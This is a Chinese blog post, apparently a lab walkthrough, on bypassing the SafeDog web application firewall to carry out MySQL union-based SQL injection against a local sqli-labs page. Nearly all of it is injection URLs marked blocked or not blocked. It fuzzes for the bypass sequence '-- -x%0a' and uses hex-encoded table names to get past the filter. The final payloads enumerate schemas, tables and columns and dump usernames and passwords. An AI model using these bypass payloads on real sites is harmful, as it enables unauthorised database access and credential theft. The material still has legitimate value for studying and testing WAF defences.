mysql联合注入绕过安全狗 

http://192.168.1.131/Less-1/index.php?id=1 数值型注入
 
首先判断是否存在注入点
这里使用的是科学记数法 简单粗暴
http://192.168.1.131/Less-1/index.php?id=1e0	不变
http://192.168.1.131/Less-1/index.php?id=1e9   报错
 
 
然后判断字段数 order by
http://192.168.1.131/Less-1/index.php?id=1 order by 1		 拦截
http://192.168.1.131/Less-1/index.php?id=1 order /*!by*/ 1   不拦截
结果:字段数为3
 
继续联合查询注入构造语句
http://192.168.1.131/Less-1/index.php?id=1e9 union select 1,2,3  拦截
 
小技巧:这里的科学计数法可以和union连写
 
http://192.168.1.131/Less-1/index.php?id=1e9union select 1,2,3   拦截
 
判断可以fuzz进行绕过的地方
http://192.168.1.131/Less-1/index.php?id=1e9union select 1,2,3    拦截
http://192.168.1.131/Less-1/index.php?id=1e9uxnion select 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9unionx select 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union xselect 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union sexlect 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union selectx 1,2,3   拦截
 
不拦截的有
http://192.168.1.131/Less-1/index.php?id=1e9uxnion select 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9unionx select 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union xselect 1,2,3   不拦截
http://192.168.1.131/Less-1/index.php?id=1e9union sexlect 1,2,3    不拦截
 
再判断我们不可以把select union关键词之间添加说明我们只能fuzz
http://192.168.1.131/Less-1/index.php?id=1e9union[fuzz]select 1,2,3
这个fuzz的地方了
 
试下我们常规的绕过吧 /**/ /*!*/ %0d%0a %23%0a
http://192.168.1.131/Less-1/index.php?id=1e9union/**/select 1,2,3             拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%0d%0a*/select 1,2,3      拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!*/%0d%0a/**/select 1,2,3  拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!*/%0d%0aselect/**/1,2,3   拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!*/%0d%0a/*!50000select*//**/1,2,3   拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%23%0a*//*!50000select*//**/1,2,3   拦截
继续复杂点
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%23%0a/*!50000select*/1,2,3  拦截
加点符号干扰
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%23!@@@@!!!%0a/*!50000select*/1,2,3  拦截
http://192.168.1.131/Less-1/index.php?id=1e9union/*!-- -%23!@x\\\\\x@@@xx!!xx!%0a/*!50000select*/1,2,3 突破了
 
然后我们开始简化 把没用的字符去掉 
最简化:http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect 1,2,3
提取关键词 -- -x%0a
 
继续注入
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect 1,database(),3       拦截
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect 1,database/*!*/(),3  拦截
Fuzz:
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect1,database/*!*/(),3   拦截
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselectx1,database/*!*/(),3  不拦截
 
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect[fuzz]1,database/*!*/(),3  
 
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,database/*!*/(),3  不拦截
 
爆库名
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(SCHEMA_NAME),3 from information_schema.SCHEMATA  不拦截
 
爆表名
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(table_NAME),3 from information_schema.tables where table_schema='security' 不拦截
 
爆字段名
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME = 'users' and TABLE_SCHEMA = 'Security'拦截
 
 
思考下 拦截单引号吗 那为什么爆表名的时候为什么不会拦截 关键词吗 比如TABLE_NAME and 之类的
 
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME = 'users' anxd TABLE_SCHEMA = 'Security' 报错
 
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME = 'users' && TABLE_SCHEMA = 'Security'  拦截
 
单引号可能拦截 我们16进制编码看下
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME =0x7573657273 && TABLE_SCHEMA =0x5365637572697479   不拦截
 
最后查询内容
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,concat(0x7e,username,0x7e,password,0x7e),3 from users   不拦截
posted @   zpchcbd  阅读(100)  评论(0编辑  收藏  举报
编辑推荐:
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
阅读排行:
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
点击右上角即可分享
微信分享提示